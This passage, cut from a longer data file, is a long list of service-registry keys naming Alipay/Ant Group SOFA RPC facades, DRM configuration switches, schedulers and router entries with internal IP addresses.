OUTER","com.alipay.finfiprod.common.service.facade.rfm.asset.service.RfmAssetListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.newyearone.NewYearOneInnerRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rceducenter.biz.gateway.EduGwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@custcpt#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkscmprod_bpProcessFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.feature.FeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.spi.InstTradeConsultService:1.0:tradefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.ReplayTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aldiscoverymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.compareCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_RPC_TRANSMIT_MESSAGEFUSION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mcommerceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.openDetailLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-finfundtaskcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acoffercenter.common.service.facade.privatecloud.offer.OfferQueryForPCFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.biscenter.uem.common.service.facade.permission.v2.OperatorShopPermissionVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.WithdrawApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudnet.facade.armory.ArmoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.selfhelp.AppAuthTokenInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.132.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.250.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.eccommon.monitor.drm.resource.LoggerSwitchControlResource.pvOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsUpVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.StaleDataClearFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.meshysale.common.service.facade.rules.RuleCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.csportal:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderAuditAfterValidService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestSampleBizProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.anteduprod.common.service.facade.api.certify.QueryStudentIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.edu.BizContractInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insendorseprod.common.service.inst.InsEndorseUserVisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zauth.facade.ZauthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.acctrans.facade.api.acctrans.AcctransPaymentFinalizer:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:FUND_SCHEME_PROD_GROUP_MANAGE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.55.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_PCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.hahaTest:name=com.alipay.tutorial.msgbroker.drm.DrmDemo.open,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.facade.ChannelRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.v2.service.TenantAwareAuthService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencommon.rcache.facade.RcacheMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.heralib.service.facade.api.ComputeQueryCheckServiceFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbaudit.common.service.facade.kbdatafactory.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.thridline.FundCheckResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundguard.facade.api.safecheck.CheckProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.RpcTestServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcdp.common.service.facade.fatigue.KbcdpFatigueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdspcore.common.service.facade.api.RiskQuestionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:trafficcardsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.industrycoupon.IndustryCouponServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.movehome.api.MoveHomeLeadsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dmpservice.common.service.facade.promotion.PromotionPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.36.13.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.accreditcore.common.service.facade.BpmsCallBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.apipay.instportal.common.service.facade.SignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sccounter.facade.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.cmd.RepayCmdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.TradeSettleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdiscountprod.common.service.facade.ticket.api.MerchantDonateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.TransferModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:111@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.integration.tair.TairClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.healthABDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.astaralarm.common.service.facade.AlarmRuleCategoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.WinLimitInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayeeDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isv.common.service.facade.CommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mfinquotationprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.service.CouponPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fcrcportal.rcportalDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ignetdecision.service.facade.product.ConnectProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.callback.DataFetcher:1.0:mrchiscore_onlineLeadsOperationUpdate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundVirtualTradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.signPcreditStageArrangementLink,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.212.134.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.common.service.facade.api.ViewReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:wealthgoldtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_HENGSHAN_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.easytest.agent.facade.DataExecutionFacade:1.0:ifxquote_dataExecutionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.gloancore.common.service.facade.bill.api.LcRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.product.HiNetProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.biz.yebsixyear.YebSixYearCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.TransferOutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.IndustrygwAppConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PaccPostProcessorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.client.policynotify.extension.PolicyNotifyFetcherComponent:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.SliceClearingResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_MINIPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.108.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycap.common.service.facade.worktask.facade.PrivacyQuestionManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.MailContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:fintradecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.user.service.AgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaBundleRelationDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:checkservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antmember.common.service.facade.goldeneye.PatekGoldenEyeTargetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.orgassertquerydata.api.OfflineDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.virtualprod.common.service.facade.educate.sign.EduUserSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.transcode.PcInstTransCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebppcenter.common.service.facade.api.RepaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.OrderPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.TraceLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.maxPosterNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.RequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.special.OstsProjectSpecialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.crowd.api.CrowdCalcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcsql.common.service.facade.api.ScriptOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.156.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.149.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.partner.PartnerFrameWorkflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.TowerRuleDebugFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.AppletManageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.WarningDecisionConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileaix.common.service.facade.TrainingTaskRndFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.service.api.BizTypeConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:wufu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.rfm.product.service.RfmProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.rayag.facade.service.job.JobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.metadata.common.service.rest.meta.RestMetaTypeService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebplus.common.facade.service.api.yebscene.YebcSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.api.auth.AuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-testrcIdtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.prod.PromoInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchishub_configImportProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountDailyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mmtcafts@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intopermanager.common.service.facade.api.aistudio.WhiteboxAnalysisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundCustodyTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:datatrans@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbindustryomp.common.service.facade.api.merchant.MerchantRecruitInviteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cicada:name=com.alipay.cicada.core.model.resource.drm.CicadaCacheDRMConfig.dispatch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.service.facade.McenterUserRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.ArBillConfirmationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.service.facade.api.fund.FundRequireFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:yebbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-chargefront-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.certify.service.facade.CertificateUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.api.PaymentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apacc.common.service.facade.module.StrategyMetadataEventFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.transfercenter.common.service.facade.api.TransferBankQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.RuleRunnerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.changeriskmanage.common.service.facade.callback.ProcessCallback:1.0:finsecuritybossProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.shadowSmartFoEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payplus.common.service.facade.api.EnjoyPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.SchemaRuleApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:inclusionconfdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.MonthlyBillQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finquotationcenter.common.service.facade.api.QuotationHandleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.outsideasset.facade.OutsideAssetBindRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.AmlUserInfoApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayPaymentConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:imerchprod_globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.isv.admin.IsvQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.biz.service.impl.drm.DrmFininfoSwitchTrigger.switchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.166.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.cp.api.CpGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.airbops.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:kaleidoscopetwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.ExecutionNotifyFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.business.RecruitApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationEntitySideStrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.CloseBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.AstcAssetPreBuildDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.StockCompanyBusinessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.ItemOutRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.LogStrategy.collectable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.comparacenter.common.service.facade.DeploymentOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.schedulerCtrl:name=com.alipay.scheduler.drm.SchedulerTaskResource.activeTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.core.service.eval.service.MqRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.syncErrorDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservindustryprod.common.service.facade.backend.LabelModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.service.dtm.service.CommonSlsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcDataSupportTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.toutiaoMediaLevelMid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:ANTINS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.jbAlipassId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEF